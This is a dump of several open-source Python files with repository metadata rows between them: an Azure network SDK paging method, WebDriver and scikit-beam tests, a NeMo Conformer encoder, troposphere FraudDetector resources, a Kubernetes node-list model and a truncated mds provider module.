"""Gets all the application security groups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.ApplicationSecurityGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
| 49.828413
| 219
| 0.671641
|
cfc63bd788de2e38d7c092aeaea61a78411f1b65
| 1,538
|
py
|
Python
|
webdriver/tests/get_element_tag_name/get.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
webdriver/tests/get_element_tag_name/get.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 7,642
|
2018-05-28T09:38:03.000Z
|
2022-03-31T20:55:48.000Z
|
webdriver/tests/get_element_tag_name/get.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
from tests.support.asserts import assert_error, assert_success
def get_element_tag_name(session, element_id):
return session.transport.send(
"GET", "session/{session_id}/element/{element_id}/name".format(
session_id=session.session_id,
element_id=element_id))
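# Illustrative note (not part of the test suite; ids are made up): for session id "abc" and
# element id "123" the helper above issues
#   GET /session/abc/element/123/name
# which is the WebDriver "Get Element Tag Name" endpoint exercised by the tests below.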
def test_no_top_browsing_context(session, closed_window):
original_handle, element = closed_window
response = get_element_tag_name(session, element.id)
assert_error(response, "no such window")
response = get_element_tag_name(session, "foo")
assert_error(response, "no such window")
session.window_handle = original_handle
response = get_element_tag_name(session, element.id)
assert_error(response, "no such element")
def test_no_browsing_context(session, closed_frame):
response = get_element_tag_name(session, "foo")
assert_error(response, "no such window")
def test_element_not_found(session):
result = get_element_tag_name(session, "foo")
assert_error(result, "no such element")
def test_element_stale(session, inline):
session.url = inline("<input id=foo>")
element = session.find.css("input", all=False)
session.refresh()
result = get_element_tag_name(session, element.id)
assert_error(result, "stale element reference")
def test_get_element_tag_name(session, inline):
session.url = inline("<input id=foo>")
element = session.find.css("input", all=False)
result = get_element_tag_name(session, element.id)
assert_success(result, "input")
| 32.041667
| 71
| 0.735371
|
a40ff9efe418cce820c11d5dc24f49f4889c8ed2
| 5,413
|
py
|
Python
|
skbeam/core/tests/test_feature.py
|
licode/scikit-beam
|
8100cc9525a5be4ab1e48f6a6b2b7d33302db27e
|
[
"BSD-3-Clause"
] | 1
|
2018-10-12T02:01:02.000Z
|
2018-10-12T02:01:02.000Z
|
skbeam/core/tests/test_feature.py
|
licode/scikit-beam
|
8100cc9525a5be4ab1e48f6a6b2b7d33302db27e
|
[
"BSD-3-Clause"
] | null | null | null |
skbeam/core/tests/test_feature.py
|
licode/scikit-beam
|
8100cc9525a5be4ab1e48f6a6b2b7d33302db27e
|
[
"BSD-3-Clause"
] | null | null | null |
# ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# @author: Li Li (lili@bnl.gov) #
# created on 08/19/2014 #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
from __future__ import absolute_import, division, print_function
import numpy as np
from numpy.testing import assert_array_almost_equal
from nose.tools import assert_raises
from .utils import gauss_gen, parabola_gen
import skbeam.core.feature as feature
def _test_refine_helper(x_data, y_data, center, height,
refine_method, refine_args):
"""
helper function for testing
"""
test_center, test_height = refine_method(x_data, y_data, **refine_args)
assert_array_almost_equal(np.array([test_center, test_height]),
np.array([center, height]))
def test_refine_methods():
refine_methods = [feature.refine_quadratic,
feature.refine_log_quadratic]
test_data_gens = [parabola_gen, gauss_gen]
x = np.arange(128)
for center in (15, 75, 110):
for height in (5, 10, 100):
for rf, dm in zip(refine_methods, test_data_gens):
yield (_test_refine_helper,
x, dm(x, center, height, 5), center, height, rf, {})
def test_filter_n_largest():
cands = np.array((10, 25, 50, 75, 100))
x = np.arange(128, dtype=float)
y = np.zeros_like(x)
for c, h in zip(cands,
(10, 15, 25, 30, 35)):
y += gauss_gen(x, c, h, 3)
for j in range(1, len(cands) + 2):
out = feature.filter_n_largest(y, cands, j)
assert(len(out) == np.min([len(cands), j]))
assert_raises(ValueError, feature.filter_n_largest, y, cands, 0)
assert_raises(ValueError, feature.filter_n_largest, y, cands, -1)
def test_filter_peak_height():
cands = np.array((10, 25, 50, 75, 100))
heights = (10, 20, 30, 40, 50)
x = np.arange(128, dtype=float)
y = np.zeros_like(x)
for c, h in zip(cands,
heights):
y += gauss_gen(x, c, h, 3)
for j, h in enumerate(heights):
out = feature.filter_peak_height(y, cands, h - 5, window=5)
assert(len(out) == len(heights) - j)
out = feature.filter_peak_height(y, cands, h + 5, window=5)
assert(len(out) == len(heights) - j - 1)
def test_peak_refinement():
cands = np.array((10, 25, 50, 75, 100))
heights = (10, 20, 30, 40, 50)
x = np.arange(128, dtype=float)
y = np.zeros_like(x)
for c, h in zip(cands, heights):
y += gauss_gen(x, c+.5, h, 3)
loc, ht = feature.peak_refinement(x, y, cands, 5,
feature.refine_log_quadratic)
assert_array_almost_equal(loc, cands + .5, decimal=3)
assert_array_almost_equal(ht, heights, decimal=3)
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
| 45.487395
| 75
| 0.55145
|
6f0d3698deb7ee9a157cd4e7181c16f80f38ff6b
| 9,888
|
py
|
Python
|
nemo/collections/asr/modules/conformer_encoder.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | 1
|
2021-06-19T19:27:19.000Z
|
2021-06-19T19:27:19.000Z
|
nemo/collections/asr/modules/conformer_encoder.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
nemo/collections/asr/modules/conformer_encoder.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from collections import OrderedDict
import torch
import torch.nn as nn
from nemo.collections.asr.parts.conformer_modules import ConformerLayer
from nemo.collections.asr.parts.multi_head_attention import PositionalEncoding, RelPositionalEncoding
from nemo.collections.asr.parts.subsampling import ConvSubsampling
from nemo.core.classes.common import typecheck
from nemo.core.classes.exportable import Exportable
from nemo.core.classes.module import NeuralModule
from nemo.core.neural_types import AcousticEncodedRepresentation, LengthsType, NeuralType, SpectrogramType
__all__ = ['ConformerEncoder']
class ConformerEncoder(NeuralModule, Exportable):
"""
The encoder for ASR model of Conformer.
Based on this paper:
'Conformer: Convolution-augmented Transformer for Speech Recognition' by Anmol Gulati et al.
https://arxiv.org/abs/2005.08100
Args:
feat_in (int): the size of feature channels
n_layers (int): number of layers of ConformerBlock
d_model (int): the hidden size of the model
feat_out (int): the size of the output features
Defaults to -1 (means feat_out is d_model)
subsampling (str): the method of subsampling, choices=['vggnet', 'striding']
Defaults to striding.
subsampling_factor (int): the subsampling factor which should be power of 2
Defaults to 4.
subsampling_conv_channels (int): the size of the convolutions in the subsampling module
Defaults to -1 which would set it to d_model.
ff_expansion_factor (int): the expansion factor in feed forward layers
Defaults to 4.
self_attention_model (str): type of the attention layer and positional encoding
'rel_pos': relative positional embedding and Transformer-XL
'abs_pos': absolute positional embedding and Transformer
default is rel_pos.
pos_emb_max_len (int): the maximum length of positional embeddings
Defaults to 5000.
n_heads (int): number of heads in multi-headed attention layers
Defaults to 4.
xscaling (bool): enables scaling the inputs to the multi-headed attention layers by sqrt(d_model)
Defaults to True.
untie_biases (bool): whether to not share (untie) the bias weights between layers of Transformer-XL
Defaults to True.
conv_kernel_size (int): the size of the convolutions in the convolutional modules
Defaults to 31.
dropout (float): the dropout rate used in all layers except the attention layers
Defaults to 0.1.
dropout_emb (float): the dropout rate used for the positional embeddings
Defaults to 0.1.
dropout_att (float): the dropout rate used for the attention layer
Defaults to 0.0.
"""
def input_example(self):
"""
Generates input examples for tracing etc.
Returns:
A tuple of input examples.
"""
input_example = torch.randn(16, self._feat_in, 256).to(next(self.parameters()).device)
input_example_length = torch.randint(0, 256, (16,)).to(next(self.parameters()).device)
return tuple([input_example, input_example_length])
@property
def input_types(self):
"""Returns definitions of module input ports.
"""
return OrderedDict(
{
"audio_signal": NeuralType(('B', 'D', 'T'), SpectrogramType()),
"length": NeuralType(tuple('B'), LengthsType()),
}
)
@property
def output_types(self):
"""Returns definitions of module output ports.
"""
return OrderedDict(
{
"outputs": NeuralType(('B', 'D', 'T'), AcousticEncodedRepresentation()),
"encoded_lengths": NeuralType(tuple('B'), LengthsType()),
}
)
def __init__(
self,
feat_in,
n_layers,
d_model,
feat_out=-1,
subsampling='striding',
subsampling_factor=4,
subsampling_conv_channels=-1,
ff_expansion_factor=4,
self_attention_model='rel_pos',
n_heads=4,
att_context_size=None,
xscaling=True,
untie_biases=True,
pos_emb_max_len=5000,
conv_kernel_size=31,
dropout=0.1,
dropout_emb=0.1,
dropout_att=0.0,
):
super().__init__()
d_ff = d_model * ff_expansion_factor
self.d_model = d_model
self._feat_in = feat_in
self.scale = math.sqrt(self.d_model)
if att_context_size:
self.att_context_size = att_context_size
else:
self.att_context_size = [-1, -1]
if xscaling:
self.xscale = math.sqrt(d_model)
else:
self.xscale = None
if subsampling_conv_channels == -1:
subsampling_conv_channels = d_model
if subsampling:
self.pre_encode = ConvSubsampling(
subsampling=subsampling,
subsampling_factor=subsampling_factor,
feat_in=feat_in,
feat_out=d_model,
conv_channels=subsampling_conv_channels,
activation=nn.ReLU(),
)
self._feat_out = d_model
else:
self._feat_out = d_model
self.pre_encode = nn.Linear(feat_in, d_model)
if not untie_biases and self_attention_model == "rel_pos":
d_head = d_model // n_heads
pos_bias_u = nn.Parameter(torch.Tensor(n_heads, d_head))
pos_bias_v = nn.Parameter(torch.Tensor(n_heads, d_head))
nn.init.zeros_(pos_bias_u)
nn.init.zeros_(pos_bias_v)
else:
pos_bias_u = None
pos_bias_v = None
if self_attention_model == "rel_pos":
self.pos_enc = RelPositionalEncoding(
d_model=d_model,
dropout_rate=dropout,
max_len=pos_emb_max_len,
xscale=self.xscale,
dropout_rate_emb=dropout_emb,
)
elif self_attention_model == "abs_pos":
pos_bias_u = None
pos_bias_v = None
self.pos_enc = PositionalEncoding(
d_model=d_model, dropout_rate=dropout, max_len=pos_emb_max_len, xscale=self.xscale
)
else:
raise ValueError(f"Not valid self_attention_model: '{self_attention_model}'!")
self.layers = nn.ModuleList()
for i in range(n_layers):
layer = ConformerLayer(
d_model=d_model,
d_ff=d_ff,
self_attention_model=self_attention_model,
n_heads=n_heads,
conv_kernel_size=conv_kernel_size,
dropout=dropout,
dropout_att=dropout_att,
pos_bias_u=pos_bias_u,
pos_bias_v=pos_bias_v,
)
self.layers.append(layer)
        if feat_out > 0 and feat_out != self._feat_out:
            # Project the encoder output to the requested feature size.
            self.out_proj = nn.Linear(self._feat_out, feat_out)
            self._feat_out = feat_out
        else:
            self.out_proj = None
            self._feat_out = d_model
@typecheck()
def forward(self, audio_signal, length=None):
if length is None:
length = torch.tensor(audio_signal.size(-1)).repeat(audio_signal.size(0)).to(audio_signal)
audio_signal = torch.transpose(audio_signal, 1, 2)
if isinstance(self.pre_encode, ConvSubsampling):
audio_signal, length = self.pre_encode(audio_signal, length)
else:
            audio_signal = self.pre_encode(audio_signal)
audio_signal, pos_emb = self.pos_enc(audio_signal)
bs, xmax, idim = audio_signal.size()
# Create the self-attention and padding masks
pad_mask = self.make_pad_mask(length, max_time=xmax, device=audio_signal.device)
att_mask = pad_mask.unsqueeze(1).repeat([1, xmax, 1])
att_mask = att_mask & att_mask.transpose(1, 2)
if self.att_context_size[0] >= 0:
att_mask = att_mask.triu(diagonal=-self.att_context_size[0])
if self.att_context_size[1] >= 0:
att_mask = att_mask.tril(diagonal=self.att_context_size[1])
att_mask = ~att_mask
pad_mask = ~pad_mask
for lth, layer in enumerate(self.layers):
audio_signal = layer(x=audio_signal, att_mask=att_mask, pos_emb=pos_emb, pad_mask=pad_mask)
if self.out_proj is not None:
audio_signal = self.out_proj(audio_signal)
audio_signal = torch.transpose(audio_signal, 1, 2)
return audio_signal, length
@staticmethod
def make_pad_mask(seq_lens, max_time, device=None):
"""Make masking for padding."""
bs = seq_lens.size(0)
seq_range = torch.arange(0, max_time, dtype=torch.int32)
seq_range_expand = seq_range.unsqueeze(0).expand(bs, max_time)
seq_lens = seq_lens.type(seq_range_expand.dtype).to(seq_range_expand.device)
seq_length_expand = seq_lens.unsqueeze(-1)
mask = seq_range_expand < seq_length_expand
if device:
mask = mask.to(device)
return mask
| 38.625
| 107
| 0.63218
|
bb1152506c891b434268f050de6322a772d56712
| 3,324
|
py
|
Python
|
troposphere/frauddetector.py
|
pierretr/troposphere
|
1bd6a010a3132aa3436ffe6b892f352876face4b
|
[
"BSD-2-Clause"
] | 4,573
|
2015-01-02T20:31:04.000Z
|
2022-03-31T17:15:32.000Z
|
troposphere/frauddetector.py
|
pierretr/troposphere
|
1bd6a010a3132aa3436ffe6b892f352876face4b
|
[
"BSD-2-Clause"
] | 1,730
|
2015-01-02T19:24:47.000Z
|
2022-03-31T23:22:52.000Z
|
troposphere/frauddetector.py
|
pierretr/troposphere
|
1bd6a010a3132aa3436ffe6b892f352876face4b
|
[
"BSD-2-Clause"
] | 1,753
|
2015-01-01T01:24:12.000Z
|
2022-03-27T05:36:17.000Z
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 39.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import boolean
class EntityType(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class EventVariable(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"DataSource": (str, False),
"DataType": (str, False),
"DefaultValue": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
"VariableType": (str, False),
}
class Label(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class EventType(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"EntityTypes": ([EntityType], False),
"EventVariables": ([EventVariable], False),
"Inline": (boolean, False),
"Labels": ([Label], False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class Model(AWSProperty):
props = {
"Arn": (str, False),
}
class Outcome(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"Inline": (boolean, False),
"LastUpdatedTime": (str, False),
"Name": (str, False),
"Tags": (Tags, False),
}
class Rule(AWSProperty):
props = {
"Arn": (str, False),
"CreatedTime": (str, False),
"Description": (str, False),
"DetectorId": (str, False),
"Expression": (str, False),
"Language": (str, False),
"LastUpdatedTime": (str, False),
"Outcomes": ([Outcome], False),
"RuleId": (str, False),
"RuleVersion": (str, False),
"Tags": (Tags, False),
}
class Detector(AWSObject):
resource_type = "AWS::FraudDetector::Detector"
props = {
"AssociatedModels": ([Model], False),
"Description": (str, False),
"DetectorId": (str, True),
"DetectorVersionStatus": (str, False),
"EventType": (EventType, True),
"RuleExecutionMode": (str, False),
"Rules": ([Rule], True),
"Tags": (Tags, False),
}
class Variable(AWSObject):
resource_type = "AWS::FraudDetector::Variable"
props = {
"DataSource": (str, True),
"DataType": (str, True),
"DefaultValue": (str, True),
"Description": (str, False),
"Name": (str, True),
"Tags": (Tags, False),
"VariableType": (str, False),
}
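# Illustrative usage sketch (comment only; resource title and values are assumptions,
# not part of this autogenerated module):
#   from troposphere import Template
#   t = Template()
#   t.add_resource(Variable(
#       "ExampleVariable",
#       DataSource="EVENT",
#       DataType="STRING",
#       DefaultValue="none",
#       Name="example_variable",
#   ))
#   print(t.to_json())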
| 25.181818
| 52
| 0.529483
|
875a975855ead45fe0e94fa9e0990fe0ef22e926
| 6,326
|
py
|
Python
|
kubernetes/client/models/v1_node_list.py
|
iguazio/python
|
c2684bb479d44a49a2010ec4ede5ffa7b17349dd
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_node_list.py
|
iguazio/python
|
c2684bb479d44a49a2010ec4ede5ffa7b17349dd
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_node_list.py
|
iguazio/python
|
c2684bb479d44a49a2010ec4ede5ffa7b17349dd
|
[
"Apache-2.0"
] | 1
|
2019-01-10T11:13:52.000Z
|
2019-01-10T11:13:52.000Z
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1NodeList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'items': 'list[V1Node]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None):
"""
V1NodeList - a model defined in Swagger
"""
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""
Gets the api_version of this V1NodeList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1NodeList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1NodeList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1NodeList.
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""
Gets the items of this V1NodeList.
List of nodes
:return: The items of this V1NodeList.
:rtype: list[V1Node]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1NodeList.
List of nodes
:param items: The items of this V1NodeList.
:type: list[V1Node]
"""
if items is None:
raise ValueError("Invalid value for `items`, must not be `None`")
self._items = items
@property
def kind(self):
"""
Gets the kind of this V1NodeList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1NodeList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1NodeList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1NodeList.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1NodeList.
Standard list metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The metadata of this V1NodeList.
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1NodeList.
Standard list metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param metadata: The metadata of this V1NodeList.
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1NodeList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 29.839623
| 281
| 0.594689
|
2ac3e7213fda0c3738565b8c92f155a8d809a1ae
| 2,378
|
py
|
Python
|
arithmetic_analysis/in_static_equilibrium.py
|
NISH1001/Python
|
7a9b3c7292cbd71fdc7723f449b9bbcbefbf9747
|
[
"MIT"
] | 6
|
2022-03-25T06:41:39.000Z
|
2022-03-28T17:26:42.000Z
|
arithmetic_analysis/in_static_equilibrium.py
|
NISH1001/Python
|
7a9b3c7292cbd71fdc7723f449b9bbcbefbf9747
|
[
"MIT"
] | 33
|
2022-02-19T19:41:47.000Z
|
2022-02-24T20:53:39.000Z
|
arithmetic_analysis/in_static_equilibrium.py
|
NISH1001/Python
|
7a9b3c7292cbd71fdc7723f449b9bbcbefbf9747
|
[
"MIT"
] | 3
|
2022-02-21T21:00:29.000Z
|
2022-02-24T13:48:21.000Z
|
"""
Checks if a system of forces is in static equilibrium.
"""
from __future__ import annotations
from numpy import array, cos, cross, ndarray, radians, sin
def polar_force(
magnitude: float, angle: float, radian_mode: bool = False
) -> list[float]:
"""
Resolves force along rectangular components.
(force, angle) => (force_x, force_y)
>>> polar_force(10, 45)
[7.071067811865477, 7.0710678118654755]
>>> polar_force(10, 3.14, radian_mode=True)
[-9.999987317275396, 0.01592652916486828]
"""
if radian_mode:
return [magnitude * cos(angle), magnitude * sin(angle)]
return [magnitude * cos(radians(angle)), magnitude * sin(radians(angle))]
def in_static_equilibrium(
forces: ndarray, location: ndarray, eps: float = 10**-1
) -> bool:
"""
Check if a system is in equilibrium.
It takes two numpy.array objects.
forces ==> [
[force1_x, force1_y],
[force2_x, force2_y],
....]
location ==> [
[x1, y1],
[x2, y2],
....]
>>> force = array([[1, 1], [-1, 2]])
>>> location = array([[1, 0], [10, 0]])
>>> in_static_equilibrium(force, location)
False
"""
# summation of moments is zero
moments: ndarray = cross(location, forces)
sum_moments: float = sum(moments)
return abs(sum_moments) < eps
if __name__ == "__main__":
# Test to check if it works
forces = array(
[polar_force(718.4, 180 - 30), polar_force(879.54, 45), polar_force(100, -90)]
)
location = array([[0, 0], [0, 0], [0, 0]])
assert in_static_equilibrium(forces, location)
# Problem 1 in image_data/2D_problems.jpg
forces = array(
[
polar_force(30 * 9.81, 15),
polar_force(215, 180 - 45),
polar_force(264, 90 - 30),
]
)
location = array([[0, 0], [0, 0], [0, 0]])
assert in_static_equilibrium(forces, location)
# Problem in image_data/2D_problems_1.jpg
forces = array([[0, -2000], [0, -1200], [0, 15600], [0, -12400]])
location = array([[0, 0], [6, 0], [10, 0], [12, 0]])
assert in_static_equilibrium(forces, location)
import doctest
doctest.testmod()
| 28.650602
| 87
| 0.549201
|
1f4948688b1ebb59a7eefb01f83d63c9f3d1ff74
| 58
|
py
|
Python
|
tests/source/test_18.py
|
DragosUnguru/PyPP-Byterun
|
2cbd7c875e7578e38706e48c2e38e0f5abfe6662
|
[
"MIT"
] | 1
|
2020-02-16T01:45:57.000Z
|
2020-02-16T01:45:57.000Z
|
tests/source/test_18.py
|
DragosUnguru/PyPP-Byterun
|
2cbd7c875e7578e38706e48c2e38e0f5abfe6662
|
[
"MIT"
] | null | null | null |
tests/source/test_18.py
|
DragosUnguru/PyPP-Byterun
|
2cbd7c875e7578e38706e48c2e38e0f5abfe6662
|
[
"MIT"
] | null | null | null |
def main():
a = 3
b = 10
c = a % b
c = 15
b = c % a
| 7.25
| 11
| 0.362069
|
4a2baa226668353cf0da570460bd3481f6306c5b
| 6,520
|
py
|
Python
|
mds/providers.py
|
hdemma/mds-provider
|
f50b79b686cbb4631e5d4b241a0fe1a6336d2f8d
|
[
"MIT"
] | 17
|
2018-09-21T00:46:09.000Z
|
2021-09-29T13:26:22.000Z
|
mds/providers.py
|
hdemma/mds-provider
|
f50b79b686cbb4631e5d4b241a0fe1a6336d2f8d
|
[
"MIT"
] | 56
|
2018-09-20T18:02:12.000Z
|
2020-05-21T07:41:28.000Z
|
mds/providers.py
|
hdemma/mds-provider
|
f50b79b686cbb4631e5d4b241a0fe1a6336d2f8d
|
[
"MIT"
] | 22
|
2018-09-20T23:53:26.000Z
|
2021-06-07T19:00:41.000Z
|
"""
Work with Providers from the registry.
"""
import csv
import pathlib
import uuid
import requests
import mds.github
from .schemas import STATUS_CHANGES, TRIPS, EVENTS, VEHICLES
from .versions import Version
class Provider():
"""
A simple model for an entry in a Provider registry.
"""
def __init__(self, identifier=None, ref=mds.github.MDS_DEFAULT_REF, path=None, **kwargs):
"""
Initialize a new Provider instance.
Parameters:
identifier: str, UUID, Provider, optional
The provider_id or provider_name from the registry.
ref: str, Version
The reference (git commit, branch, tag, or version) at which to query the registry.
path: str, Path, optional
A path to a local registry file.
provider_name: str, optional
The name of the provider from the registry.
provider_id: str, UUID
The unique identifier for the provider from the registry.
url: str
The provider's website url from the registry.
mds_api_url: str
The provider's base API url from the registry.
gbfs_api_url: str
The provider's GBFS API url from the registry.
Additional keyword parameters are set as attributes on the Provider instance.
"""
# parsing a Provider record
if not identifier:
self.provider_name = kwargs.pop("provider_name", None)
provider_id = kwargs.pop("provider_id", None)
self.provider_id = provider_id if isinstance(provider_id, uuid.UUID) else uuid.UUID(provider_id)
